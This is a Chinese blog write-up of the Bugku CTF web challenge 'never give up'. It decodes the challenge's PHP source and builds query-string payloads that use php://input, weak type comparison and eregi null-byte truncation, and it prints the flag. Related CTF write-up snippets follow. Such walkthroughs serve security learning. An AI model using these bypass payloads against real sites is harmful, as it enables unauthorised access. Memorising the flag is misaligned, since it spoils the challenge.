Bugku-web-never give up

最新推荐文章于 2024-05-21 21:44:07 发布
最新推荐文章于 2024-05-21 21:44:07 发布
阅读量241 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_45679095/article/details/106947751
版权

never give up

看源码之后发现有一个

1p.html

访问一下,总是会跳转,于是抓包
在这里插入图片描述

将里面的字符串先url解码一下

<script>window.location.href='http://www.bugku.com';</script> 
<!--JTIyJTNCaWYlMjglMjElMjRfR0VUJTVCJTI3aWQlMjclNUQlMjklMEElN0IlMEElMDloZWFkZXIlMjglMjdMb2NhdGlvbiUzQSUyMGhlbGxvLnBocCUzRmlkJTNEMSUyNyUyOSUzQiUwQSUwOWV4aXQlMjglMjklM0IlMEElN0QlMEElMjRpZCUzRCUyNF9HRVQlNUIlMjdpZCUyNyU1RCUzQiUwQSUyNGElM0QlMjRfR0VUJTVCJTI3YSUyNyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJTI3YiUyNyU1RCUzQiUwQWlmJTI4c3RyaXBvcyUyOCUyNGElMkMlMjcuJTI3JTI5JTI5JTBBJTdCJTBBJTA5ZWNobyUyMCUyN25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJTI3JTNCJTBBJTA5cmV0dXJuJTIwJTNCJTBBJTdEJTBBJTI0ZGF0YSUyMCUzRCUyMEBmaWxlX2dldF9jb250ZW50cyUyOCUyNGElMkMlMjdyJTI3JTI5JTNCJTBBaWYlMjglMjRkYXRhJTNEJTNEJTIyYnVna3UlMjBpcyUyMGElMjBuaWNlJTIwcGxhdGVmb3JtJTIxJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuJTI4JTI0YiUyOSUzRTUlMjBhbmQlMjBlcmVnaSUyOCUyMjExMSUyMi5zdWJzdHIlMjglMjRiJTJDMCUyQzElMjklMkMlMjIxMTE0JTIyJTI5JTIwYW5kJTIwc3Vic3RyJTI4JTI0YiUyQzAlMkMxJTI5JTIxJTNENCUyOSUwQSU3QiUwQSUwOXJlcXVpcmUlMjglMjJmNGwyYTNnLnR4dCUyMiUyOSUzQiUwQSU3RCUwQWVsc2UlMEElN0IlMEElMDlwcmludCUyMCUyMm5ldmVyJTIwbmV2ZXIlMjBuZXZlciUyMGdpdmUlMjB1cCUyMCUyMSUyMSUyMSUyMiUzQiUwQSU3RCUwQSUwQSUwQSUzRiUzRQ==-->

之后再base64解码一下,再url解码得到以下代码

if(!$_GET['id'])
{
	header('Location: hello.php?id=1');
	exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))  //返回a中出现'.'的位置
{
	echo 'no no no no no no no';
	return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)  //满足5个条件才会显示flag
{
	require("f4l2a3g.txt");
}
else
{
	print "never never never give up !!!";
}


?>
  1. data=="bugku is a nice plateform!"这里可以用php伪协议来写php://input post data里面传入参数
  2. id==0,在一开始要判断id不为0,之后又要弱等于0,这里就可以构造一个非空非零字符串
  3. b的长度大于5 – b的第一个字符和111连在一起后要和1114匹配 – b的第一个字符弱不等于4

ereg() 函数或 eregi() 函数存在空字符截断漏洞,即参数中的正则表达式或待匹配字符串遇到空字符则截断丢弃后面的数据。

. 在正则表达式中可以表示任何单个字符

这里b的话可以用截断,也可以用 . 来构造

b=\x0012345  
b=.12345

综上,构造

id=qqq&b=%0012345&a=php://input
id=qqq&b=.12345&a=php://input

得到flag

flag{tHis_iS_THe_fLaG}

这里还有另一种方法,就是直接访问这个f4l2a3g.txt文件,也可以显示出flag。

Bugku-webnever_give_up
weixin_42939822的博客
03-13 2354
Bugku-webnever_give_up
BUGKU-WEB
wojiushilsy的博客
02-22 650
5.矛盾 打开链接,内容如下: $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } is_numeric():检测字符串是否只由数字组成,如果字符串中只包括数字,就返回Ture,否则返回False。(注意是只包括数字) 要求我们不能输入纯数字1,但是num...
bugku never give up
rommel的博客
08-26 7494
never give up 100 http://120.24.86.145:8006/test/hello.php 作者:御结冰城 进入后我们查看源代码 发现了 于是我们访问view-source:http://120.24.86.145:8006/test/1p.html 发现了一串url编码 解密后得到 window.location.href='htt
BUGKU-WEB never_give_up
天泽岁月
03-13 1784
BUGKU-WEB never_give_up,eregi函数漏洞,%00截断
Bugku WEB never give up
qq_41696858的博客
07-02 284
1.打开环境,neer never never give up 审计源码,发现1p.html 2.尝试访问1p.html,跳转到bugku首页,抓包分析,发现js代码 3.利用burpsuite解码模块得到源码,应该是PHP代码 ———————————————————————————— <script>window.location.href='http://www.bugku.com';</script> <!--";if(!$_GET['id']) //id为0或空,进入
bugku webnever give up
L1ni01
07-31 225
https://www.cnblogs.com/cyc-endeavor/p/10375692.html 也不知道自己看了几遍 舒服啊
BugkuCTF web 输入密码查看flag——never give up
the_world_go的博客
04-06 1063
输入密码查看flag 看到要输入密码(爆破爆破爆破)。 打开bp抓包。爆破(果然弱密码) 输入密码得到 flag{bugku-baopo-hah} 点击一百万次好像网页崩了(也有可能我太菜了),进不去。。。 备份是个好习惯 打开网页,一段乱码。好的我看不懂,看源码没线索,抓包,没发现 拿御剑扫下后台吧 找到了 可以看到我要提交key1和key2,他们不相等但是md5处理以后相等 参考php漏洞...
CTF|BugkuCTF-WEB解题思路
这里是一处长期不更新的博客
06-15 2179
截止至练习题【login4】,仅提供解题思路。 WEB2 按F12直接可得flag 计算器: 直接按F12,将maxlength修改,输入正确结果即可得到flag web基础$_GET URL输入:http://123.206.87.240:8002/get/?what=flag web基础$_POST 使用hackbar工具,按F12,打开Post data,传递what=flag。 矛盾 这里是使用is_numeric遇到%00截断的漏洞,这里构造 http://120.24.86.145:8002.
BugkuCTF-web21(详细解题思路及步骤)
分享与记录
04-07 2986
目录审题F12获取信息Burp suite抓包解码分析PHP代码构造payload 审题 题目并没有什么信息,只是鼓励你不要放弃,never give up。 F12获取信息 没有额外信息,刷新了几下,也没有出现新东西。 Burp suite抓包 提示了 1p.html ,于是把GET参数改为 1p.html ,得到一串JS代码 解码 于是,在线解码 解码后仍然存在注释内容,尝试用base64解码 解码之后,发现了新信息,出现了一些函数和判断语句,同时还有许多百分号
Bugku---web---never_give_up
最新发布
weixin_47450099的博客
05-21 1602
内有弱类型比较,通配符*,伪协议等概念
Bugku CTF-web21 never give up
weixin_44023403的博客
05-26 584
Bugku CTF-web21 never give up解题遇到的问题 解题 打开网址,查看源码,发现提示1p.html; 试着打开url+1p.html,发现有跳转,用burp抓包查看源码,得到一串字符; 开头推测是被url编码了,用在线工具( UrlEncode编码/UrlDecode解码 - 站长工具 (chinaz.com))解码; 忽略注释内容,根据下面字符串特征,试着用base64解码; JTIyJTNCaWYoISUyNF9HRVQlNUInaWQnJTVEKSUwQSU3QiUwQ
Bugkuweb never give up
qq_26961571的博客
09-08 244
这道题的位置处于web部分的中部,也就是说已经进行了大约一半的题目了。这个标题非常的激励我,让我看看里面是什么。 打开之后是什么都木有啊,只有这句话。 打开源代码查看。 在注释里面就提供了方向,看来是要查看1p这个html。 顺势而为,直接在此文件夹里面打开此文件。发现果然有提示,一堆码。 首先进行URL解密: var Words ="<script>window.location.href='http://www.b...
never give up! (bugku-web)
小白的劝退之路
05-09 254
1. 打开页面 ,源码中有提示 1p.html 直接访问,页面会跳转,所以直接查看源码 2. url解码,base64解码 得到php源码如下: var Words ="<script>window.location.href='http://www.bugku.com';</script> <!--";if(!$_GET['id']) { header('L...
BugKu Web21 never never never give up
m0_49762339的博客
12-26 208
never never never give up ①打开F12:发现1p.html 发现访问后一片空白。 ②通过BP抓包该页面发现一大串编码,经过一次base64和一次url解码后得到如下php代码 <?PHP if(!$_GET['id'])//GET方法获得id的值 { header('Location: hello.php?id=1'); exit(); } $id=$_GET['id']; $a=$_GET['a']; $b=$_GET['b']; if(stripos($a,'.')
Bugku web——never give up
qq_40481505的博客
09-16 338
打开题目链接,发现什么也没有,抓个包 提示查看1p.html,查看后发现发现页面跳转,变成了https://www.bugku.com/ 抓包看源码 <HTML> <HEAD> <SCRIPT LANGUAGE="Javascript"> <!-- var Words ="%3Cscript%3Ewindow.location.href%3D%27h...
BUGKU-WEB never_give_up_never_give_up bugku
2401_84411557的博客
04-28 723
这是一段js代码,作用就是嵌入在HTML文档中,用于重定向浏览器当前页面到指定的URL——http://www.bugku.com。而 window.location.href 属性是JavaScript的全局对象window的一个属性,它表示当前窗口(浏览器标签页)加载的网页的完整URL。2. 去访问这个文件,发现直接跳转到BUGKU首页,有猫腻那就下载看看这个文件内容吧。已经被弃用(有漏洞,这里利用的就是这个漏洞,称为。字符串,至于这个参数放哪里,
never give up - bugku
sinat_41380394的博客
08-21 509
http://120.24.86.145:8006/test/hello.php?id=1 看源码知道存在一个1p.html的网页。 查看1p.html源码 var Words ="%3Cscript%3Ewindow.location.href%3D%27http%3A//www.bugku.com%27%3B%3C/script%3E%20%0A%3C%21--JTIyJTNCaWYlMj...
bugku---never give up
LuckySec
11-17 663
题目 http://123.206.87.240:8006/test/hello.php 查看源码发现有个1p.html 尝试访问 得到一串url编码 %3Cscript%3Ewindow.location.href%3D%27http%3A//www.bugku.com%27%3B%3C/script%3E%20%0A%3C%21–JTIyJTNCaWYlMjglMjElMjRfR0VUJ...
Bugku_never give up
weixin_43749601的博客
10-21 527
打开题目,只显示一行never never never give up !!! 没有其他任何信息 抓包又重放了一下,然后有一个HTML的注释 接着访问一下1p.html,查看网页源代码,发现了一个URL编码的字符串,解码后得到 <!--JTIyJTNCaWYlMjglMjElMjRfR0VUJTVCJTI3aWQlMjclNUQlMjklMEElN0IlMEElMDloZWFkZXIlMjglMjdMb2NhdGlvbiUzQSUyMGhlbGxvLnBocCUzRmlkJTNEMSUyNyUyO.
create-session=never spring security
04-10
这个问题不是一个完整的问题,但我可以根据给出的信息来回答。 "create-session=never" 是 Spring Security 中的一个配置参数,它可以防止在用户未登录情况下创建一个新的会话。这意味着当用户访问需要验证的页面时,不会自动创建一个新的会话,而是会返回一个错误。这可以防止一些 Session 相关的攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值